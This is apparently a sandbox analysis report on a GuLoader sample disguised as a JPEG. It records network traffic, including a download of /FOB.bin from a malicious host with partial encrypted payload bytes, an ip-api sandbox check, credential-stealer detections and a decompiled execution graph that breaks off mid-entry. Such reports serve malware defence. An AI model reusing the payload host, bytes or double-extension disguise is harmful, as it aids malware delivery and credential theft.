                                May 22, 2024 20:14:52.178236961 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.178244114 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.178298950 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.178338051 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.178354979 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.178411007 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.178412914 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.178466082 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.178503990 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.178553104 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.178607941 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.178628922 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.178687096 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.178741932 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.178790092 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.178841114 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.178874969 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.178932905 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.178936958 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.178988934 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.179023981 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.179044008 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.179100990 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.179128885 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.179128885 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.179156065 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.179214001 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.179225922 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.179267883 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.179275036 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.179322958 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.179323912 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.179373026 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.179378986 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.179421902 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.179434061 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.179491043 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.179492950 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.179541111 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.179547071 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.179604053 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.179609060 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.179657936 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.179660082 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.179688931 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.179699898 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.179702997 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.179711103 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.179752111 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.179768085 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.179816961 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.179826021 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.179874897 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.179874897 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.179920912 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.179924011 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.179933071 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.180022001 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.180071115 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.180169106 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.415254116 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.415277004 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.415425062 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.415425062 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.415453911 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.415477991 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.415594101 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.415649891 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.416726112 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.416846991 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.416920900 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.416955948 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.416979074 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.417017937 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.417104006 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.417104006 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.417176008 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.417273998 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.417327881 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.417399883 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.417464972 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.417484999 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.417568922 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.417587042 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.417623043 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.417623043 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.417668104 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.417716980 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.417720079 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.417783976 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.417927980 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.417938948 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.417939901 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.418071032 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.418071032 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.418190956 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.418205023 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.418314934 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.418314934 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.418404102 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.418510914 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.418559074 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.418665886 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.418818951 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.418833971 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.418845892 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.418857098 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.419003963 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.419044971 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.419087887 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.419186115 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.419186115 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.419323921 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.419339895 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.419421911 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.419461966 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.419507980 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.419589996 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.419589996 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.419696093 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.419720888 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.419910908 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.419930935 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.419935942 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.420083046 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.420187950 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.420306921 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.420317888 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.420404911 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.420420885 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.420500040 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.420536995 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.420577049 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.420778990 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:54.032672882 CEST5932780192.168.11.20208.95.112.1
                                May 22, 2024 20:14:54.208089113 CEST8059327208.95.112.1192.168.11.20
                                May 22, 2024 20:14:54.208214998 CEST5932780192.168.11.20208.95.112.1
                                May 22, 2024 20:14:54.208735943 CEST5932780192.168.11.20208.95.112.1
                                May 22, 2024 20:14:54.384155035 CEST8059327208.95.112.1192.168.11.20
                                May 22, 2024 20:14:54.432262897 CEST5932780192.168.11.20208.95.112.1
                                May 22, 2024 20:14:57.182302952 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:57.182425022 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:15:28.314335108 CEST8059327208.95.112.1192.168.11.20
                                May 22, 2024 20:16:40.737230062 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:16:41.315152884 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:16:42.486804962 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:16:44.814413071 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:16:49.454058886 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:16:58.717505932 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:17:17.229078054 CEST5932680192.168.11.20192.250.227.27
                                TimestampSource PortDest PortSource IPDest IP
                                May 22, 2024 20:14:50.759366989 CEST6495253192.168.11.201.1.1.1
                                May 22, 2024 20:14:50.980803013 CEST53649521.1.1.1192.168.11.20
                                May 22, 2024 20:14:53.852298975 CEST4993753192.168.11.201.1.1.1
                                May 22, 2024 20:14:54.028419971 CEST53499371.1.1.1192.168.11.20
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                May 22, 2024 20:14:50.759366989 CEST192.168.11.201.1.1.10x49a3Standard query (0)veysiseker.comA (IP address)IN (0x0001)false
                                May 22, 2024 20:14:53.852298975 CEST192.168.11.201.1.1.10x36fcStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                May 22, 2024 20:14:50.980803013 CEST1.1.1.1192.168.11.200x49a3No error (0)veysiseker.com192.250.227.27A (IP address)IN (0x0001)false
                                May 22, 2024 20:14:54.028419971 CEST1.1.1.1192.168.11.200x36fcNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                • veysiseker.com
                                • ip-api.com
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.11.2059326192.250.227.27807232C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                TimestampBytes transferredDirectionData
                                May 22, 2024 20:14:51.221993923 CEST166OUTGET /FOB.bin HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                Host: veysiseker.com
                                Cache-Control: no-cache
                                May 22, 2024 20:14:51.464617968 CEST1289INHTTP/1.1 200 OK
                                Date: Wed, 22 May 2024 18:14:51 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade
                                Last-Modified: Tue, 21 May 2024 07:48:07 GMT
                                Accept-Ranges: bytes
                                Content-Length: 245312
                                Vary: Accept-Encoding,User-Agent
                                Content-Type: application/octet-stream
                                Data Raw: 3f 7a 41 fa 5a 24 16 c4 05 df 65 0b 10 7d 93 f2 9b 30 3a 27 c5 11 e4 48 10 3f 50 98 72 b6 21 b8 b8 f7 cd 1c e7 39 8f e7 49 49 30 a0 ee 2f 4f b6 8a 50 6d 8f 77 96 c9 68 ee 3e 40 28 a7 0f cb e1 e9 99 de d3 34 0d b0 84 8e a7 b4 a0 01 05 de ab c9 c7 5f b6 3a 90 46 63 60 28 24 a6 00 fe a0 52 35 d5 fb b3 60 49 2e 70 6d 50 64 d1 7d 0e bc 60 81 24 b1 6c f2 82 59 25 6d 2c c2 fd 32 4f c1 0e 8f 34 73 16 45 bc 13 75 4a 90 48 53 b0 e6 50 82 23 3a 6b 88 d3 cd 16 c4 74 8e 02 3e 32 de eb 4a 0e b0 ba d2 3c 9d 44 16 ab 31 91 9a e7 e5 c9 0b 8c c0 57 dc fc 9e 04 76 89 e7 42 a1 da 8a a0 d2 37 e6 31 2c 51 d7 21 c1 79 b3 48 d4 16 32 6c 65 34 bd 89 da 02 0d 1e 41 3d 30 b6 62 8c 20 53 bc 09 dd 11 70 34 e6 fb d9 69 5a 4d 44 04 d1 2d 20 18 f6 dd 4b 48 8e 82 e1 b6 73 77 c2 30 84 46 0c 65 97 4e 7d 97 bc a0 62 64 ad 94 32 e6 03 1f 16 68 ca 7b 09 34 61 da ab 5c 27 0b ea 87 13 e1 06 ce d3 50 c8 6f 1c 9c 4a 58 50 6f 90 3f e4 a6 b6 f4 db 43 14 94 3d 1b 97 b0 2a 72 bc fe f7 54 4d f5 62 dc 12 dd bb 4d 93 8e 1b c0 1e 44 c2 3f 04 1a a4 [TRUNCATED]
                                Data Ascii: ?zAZ$e}0:'H?Pr!9II0/OPmwh>@(4_:Fc`($R5`I.pmPd}`$lY%m,2O4sEuJHSP#:kt>2J<D1WvB71,Q!yH2le4A=0b Sp4iZMD- KHsw0FeN}bd2h{4a\'PoJXPo?C=*rTMbMD?g8!#Y;&<K$'~/@ P4-U1Gz'ky@?,{t_uM`Yd/ O`hens\!4.>H6#P`'I.w|5bt]4|c24}Fpp3.@~sx717rn-*u?Av> e["?5P<1'}(RYeEacMTTAr&SccvUso;,NnT>}/*8CM-)=}1t^?W F$:!jfR?sG;_U_B];F8R(~_*ON"92f$-Y.i"fSL|DY[xB:+q^}tE<+9Qu&;(8@4aw.8WOJS-[.6)B,Ody@@&x-8-m9TT5-P;nw@x8X*O [TRUNCATED]
                                May 22, 2024 20:14:51.464632988 CEST1289INData Raw: 0f 24 82 f5 5c 0d 80 e1 be a0 be 66 5e f3 b5 a9 64 26 d5 e3 f6 64 2b 1b ff 45 9d 1c a8 d0 18 93 9b 6b 66 d9 d7 a9 af 80 2d 60 45 41 cd 85 59 0d 89 38 f4 bb e7 dc 11 bd ec 87 48 2f b4 05 fb 0f d0 90 c9 7b 39 fd 6b ae 3f 72 78 e2 e6 bb 68 77 3c 01
                                Data Ascii: $\f^d&d+Ekf-`EAY8H/{9k?rxhw<+dZLuM8oOsSsg${A~[yUP`L7\O@/aT)>4;vM.,{AN#N,dTwcgRL/2cqhB =<ihyp:^4Y'y@ag4
                                May 22, 2024 20:14:51.464770079 CEST1289INData Raw: 16 c5 32 7a d6 f4 ae 31 37 d1 88 b0 70 46 3c 2a cd 7f 21 e9 4d 1b cc 31 fd 7e 0e 8b bd c5 ae e6 0d 33 84 fc 78 ee 22 22 f8 f7 21 17 c9 61 fc 11 20 ba 91 f8 cd 73 7f 88 c2 30 d2 bb 17 48 34 ba c1 78 f2 3b 61 e2 56 b5 35 e9 30 7e 2b db 72 82 f4 fe
                                Data Ascii: 2z17pF<*!M1~3x""!a s0H4x;aV50~+rxqvEkahdT|kl]/(qa`OvAFsoFK>g;)vJ*3nQm}9F$`J[m3Qz=GKbi)Lrsq)TN<+g(@St9
                                May 22, 2024 20:14:51.464785099 CEST1289INData Raw: d0 e0 39 13 8e 56 78 13 73 30 4a f1 f0 4c 87 42 b6 b6 65 b1 f9 75 8b 2e f4 22 70 ff 6e 93 a5 8c d0 4e d3 3d 0f b3 ac 61 a6 b4 a6 fc fe f6 46 70 c7 59 b4 3f b8 a9 62 20 2e 26 a8 04 d6 51 53 35 d3 f9 bd 65 61 dd 71 6d 56 66 df 7b 26 49 61 81 22 9b
                                Data Ascii: 9Vxs0JLBeu."pnN=aFpY?b .&QS5eaqmVf{&Ia"r%m(L+2[aQk(M5_IKs"Yy&z/z)#beL&x6t_2hODahPLGy, HRw2;`JWCb0#bV
                                May 22, 2024 20:14:51.464796066 CEST1289INData Raw: fa 03 87 de ce 10 c4 35 c6 b4 a5 4a b2 af 20 f1 0a 77 c1 fc 27 bf e8 6a cd 21 07 99 41 e3 4e a0 1d 49 3e 27 95 3f 68 77 2f 0c c9 0b 8b 5b 86 39 64 5b b2 49 a5 b5 20 c0 c2 31 27 ef 9d b4 c3 f6 56 04 25 f0 fa 56 8f 8b 88 ce 01 65 14 17 91 96 17 86
                                Data Ascii: 5J w'j!ANI>'?hw/[9d[I 1'V%Ve-&Nj~&g3DmF+ZW[y)2fw]'V~mCgr!MX6z9Z<Q2Rge'(v,h-<tJbFx#S<t9
                                May 22, 2024 20:14:51.464807987 CEST1289INData Raw: 49 4e 6c e4 24 53 92 21 d6 51 87 45 a5 e4 5c 31 d0 0a 03 b3 58 98 d1 b8 88 3a 23 ae 40 65 98 26 c1 71 bc 18 45 d6 ea 3b c7 ec ca 2f 65 a4 34 93 4c 9f 73 76 ca 41 f3 91 ad a0 cd 11 97 57 bd cc e1 e2 c2 09 d7 fd 4a e2 d0 fd 04 fb 62 71 b1 49 ba 2b
                                Data Ascii: INl$S!QE\1X:#@e&qE;/e4LsvAWJbqI+#<><'vtrL-\;U#H}=8+U#Z(fEu,FcTOS>fVf.QK`vd!3vVfY]zXss<Jl
                                May 22, 2024 20:14:51.464818954 CEST1289INData Raw: 9d ec 38 b4 01 8e ac 27 81 ff 86 90 f3 59 58 fa 38 18 ec d8 30 ca 15 bf 43 d0 24 a1 d9 b6 9d 66 8f 1e c4 d1 4c ed 20 af f6 f1 1c 8f f2 33 35 2d 25 71 36 d5 9c 31 f6 b9 74 81 ff 99 6d d0 24 6b 59 89 40 c6 3f d2 72 39 f0 74 87 ba a1 c4 74 95 6d fd
                                Data Ascii: 8'YX80C$fL 35-%q61tm$kY@?r9ttm`YUf/"Oh/w\.b=h\DIv|o{4|J<7JsP3.q2ax717ru#`1A|vzE tE["9yX)?
                                May 22, 2024 20:14:51.464829922 CEST1289INData Raw: dc dc b7 52 4a 2a 8b d9 79 15 3c 68 46 2a c5 95 38 69 e5 15 7a e1 08 91 cc a1 5f c1 8d 46 37 48 24 7b 00 79 cc b7 40 7a af 9e 91 69 d9 4e ff 4a d8 59 de 3d 4e 6c 98 59 d5 54 9c ee f0 8b cf 84 64 82 24 f1 fa 60 2b bd 7a a5 de 65 76 0c 1a f6 4c 5e
                                Data Ascii: RJ*y<hF*8iz_F7H${y@ziNJY=NlYTd$`+zevL^{O>[J>8ae~O[^JYGyhpiz?l(6~f7JoS[XDOea7v _HsuV"pX[=B7'q_+Fc (
                                May 22, 2024 20:14:51.464875937 CEST1289INData Raw: c5 ed 56 ae 87 e0 51 ea b0 42 1d 27 47 8b fb 21 2d 08 69 a2 2e 49 37 a9 dd 82 3c 32 66 d1 00 76 99 cb 85 b5 9c b7 02 51 e1 cf 7f 45 77 c6 c8 b4 5c ea 4e 39 6e df f8 12 29 82 b7 7b b4 1b d2 f0 15 86 52 65 60 23 a9 13 65 a8 67 96 bd 37 fa c0 16 55
                                Data Ascii: VQB'G!-i.I7<2fvQEw\N9n){Re`#eg7Ubp!)H|+,Y5s[D,N|k4/0F<m.75UP:Y ScI1} 5KZjK,'ajx$2$?+w/[j[U 9+R
                                May 22, 2024 20:14:51.464886904 CEST1289INData Raw: 5f 84 eb 3b ad a0 80 e6 32 b3 2b d0 b0 06 0b de b0 5c 1e 46 94 9b 48 77 e7 c1 00 b0 12 88 7d 51 f2 fe ea 11 14 36 39 71 90 a7 ab 24 46 97 83 e7 93 87 44 9e 5f d7 02 87 cb 10 8d c3 51 91 50 2b 3e a9 73 4b 62 63 d5 33 97 d0 09 42 bb 67 90 ac ee 5b
                                Data Ascii: _;2+\FHw}Q69q$FD_QP+>sKbc3Bg[7Vl<xuJ(-ZoEEOVZ+K'SW`5Yb@|)He]-'d9K@lZ^'sE<+`$}Quf(I$@a*2
                                May 22, 2024 20:14:51.701567888 CEST1289INData Raw: 6e d6 b7 1c 11 3d 78 8b 2a c3 b9 a3 da f5 77 e1 af 39 47 dc 92 09 a1 e6 e7 42 a1 fc 57 a0 d2 67 a3 11 2c 1d d6 22 eb 46 36 0f b2 16 cc 62 67 34 bd 77 d6 e0 0d 3c 40 36 31 bd 9c 8d ad 5a bc 09 d5 11 50 35 e6 fb d9 39 86 4c 44 04 0f 21 22 18 36 dc
                                Data Ascii: n=x*w9GBWg,"F6bg4w<@61ZP59LD!"6KH<Vw0CavhC_lx4|'@oFXPn?G*tL'5eR/#Ye,A.*'I}6/@EP4-?1Fzg


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.11.2059327208.95.112.1807232C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                TimestampBytes transferredDirectionData
                                May 22, 2024 20:14:54.208735943 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                Host: ip-api.com
                                Connection: Keep-Alive
                                May 22, 2024 20:14:54.384155035 CEST174INHTTP/1.1 200 OK
                                Date: Wed, 22 May 2024 18:14:53 GMT
                                Content-Type: text/plain; charset=utf-8
                                Content-Length: 5
                                Access-Control-Allow-Origin: *
                                X-Ttl: 60
                                X-Rl: 44
                                Data Raw: 74 72 75 65 0a
                                Data Ascii: true


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:2
                                Start time:14:14:27
                                Start date:22/05/2024
                                Path:C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe"
                                Imagebase:0x400000
                                File size:379'400 bytes
                                MD5 hash:18776562551C3ADCDC9F49C013772FBD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.19322780922.0000000005951000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Target ID:3
                                Start time:14:14:27
                                Start date:22/05/2024
                                Path:C:\Windows\System32\dllhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                Imagebase:0x7ff7bd9e0000
                                File size:21'312 bytes
                                MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:4
                                Start time:14:14:46
                                Start date:22/05/2024
                                Path:C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe"
                                Imagebase:0x400000
                                File size:379'400 bytes
                                MD5 hash:18776562551C3ADCDC9F49C013772FBD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.24172966883.0000000033875000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:false

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:18.9%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:20.2%
                                  Total number of Nodes:1508
                                  Total number of Limit Nodes:38
                                  execution_graph 4014 402340 4021 402acb 4014->4021 4017 402acb 17 API calls 4018 40235a 4017->4018 4019 402acb 17 API calls 4018->4019 4020 402364 GetPrivateProfileStringA 4019->4020 4022 402ad7 4021->4022 4027 405f8c 4022->4027 4024 402351 4024->4017 4043 405f99 4027->4043 4028 4061bb 4029 402af8 4028->4029 4060 405f6a lstrcpynA 4028->4060 4029->4024 4044 4061d4 4029->4044 4031 406195 lstrlenA 4031->4043 4032 405f8c 10 API calls 4032->4031 4036 4060b1 GetSystemDirectoryA 4036->4043 4037 4060c4 GetWindowsDirectoryA 4037->4043 4038 4061d4 5 API calls 4038->4043 4039 405f8c 10 API calls 4039->4043 4040 40613e lstrcatA 4040->4043 4041 4060f8 SHGetSpecialFolderLocation 4042 406110 SHGetPathFromIDListA CoTaskMemFree 4041->4042 4041->4043 4042->4043 4043->4028 4043->4031 4043->4032 4043->4036 4043->4037 4043->4038 4043->4039 4043->4040 4043->4041 4053 405e51 4043->4053 4058 405ec8 wsprintfA 4043->4058 4059 405f6a lstrcpynA 4043->4059 4050 4061e0 4044->4050 4045 40624c CharPrevA 4046 406248 4045->4046 4046->4045 4048 406267 4046->4048 4047 40623d CharNextA 4047->4046 4047->4050 4048->4024 4050->4046 4050->4047 4051 40622b CharNextA 4050->4051 4052 406238 CharNextA 4050->4052 4065 40592d 4050->4065 4051->4050 4052->4047 4061 405df0 4053->4061 4056 405e85 RegQueryValueExA RegCloseKey 4057 405eb4 4056->4057 4057->4043 4058->4043 4059->4043 4060->4029 4062 405dff 4061->4062 4063 405e03 4062->4063 4064 405e08 RegOpenKeyExA 4062->4064 4063->4056 4063->4057 4064->4063 4066 405933 4065->4066 4067 405946 4066->4067 4068 405939 CharNextA 4066->4068 4067->4050 4068->4066 4994 401d41 GetDlgItem GetClientRect 4995 402acb 17 API calls 4994->4995 4996 401d71 LoadImageA SendMessageA 4995->4996 4997 402957 4996->4997 4998 401d8f DeleteObject 4996->4998 4998->4997 5006 6dda1058 5008 6dda1074 5006->5008 5007 6dda10dc 5008->5007 5010 6dda1091 5008->5010 5019 6dda14bb 5008->5019 5011 6dda14bb GlobalFree 5010->5011 5012 6dda10a1 5011->5012 5013 6dda10a8 GlobalSize 5012->5013 5014 6dda10b1 5012->5014 5013->5014 5015 6dda10b5 GlobalAlloc 5014->5015 5016 6dda10c6 5014->5016 5017 6dda14e2 3 API calls 5015->5017 5018 6dda10d1 GlobalFree 5016->5018 5017->5016 5018->5007 5021 6dda14c1 5019->5021 5020 6dda14c7 5020->5010 5021->5020 5022 6dda14d3 GlobalFree 5021->5022 5022->5010 4305 401746 4306 402acb 17 API calls 4305->4306 4307 40174d 4306->4307 4311 405b32 4307->4311 4309 401754 4310 405b32 2 API calls 4309->4310 4310->4309 4312 405b3d GetTickCount GetTempFileNameA 4311->4312 4313 405b6e 4312->4313 4314 405b6a 4312->4314 4313->4309 4314->4312 4314->4313 5023 401947 5024 402acb 17 API calls 5023->5024 5025 40194e lstrlenA 5024->5025 5026 40257d 5025->5026 5030 4025ca 5031 402aa9 17 API calls 5030->5031 5033 4025d4 5031->5033 5032 402642 5033->5032 5034 405b7b ReadFile 5033->5034 5035 402644 5033->5035 5038 402654 5033->5038 5034->5033 5039 405ec8 wsprintfA 5035->5039 5037 40266a SetFilePointer 5037->5032 5038->5032 5038->5037 5039->5032 5040 40224b 5041 402acb 17 API calls 5040->5041 5042 402251 5041->5042 5043 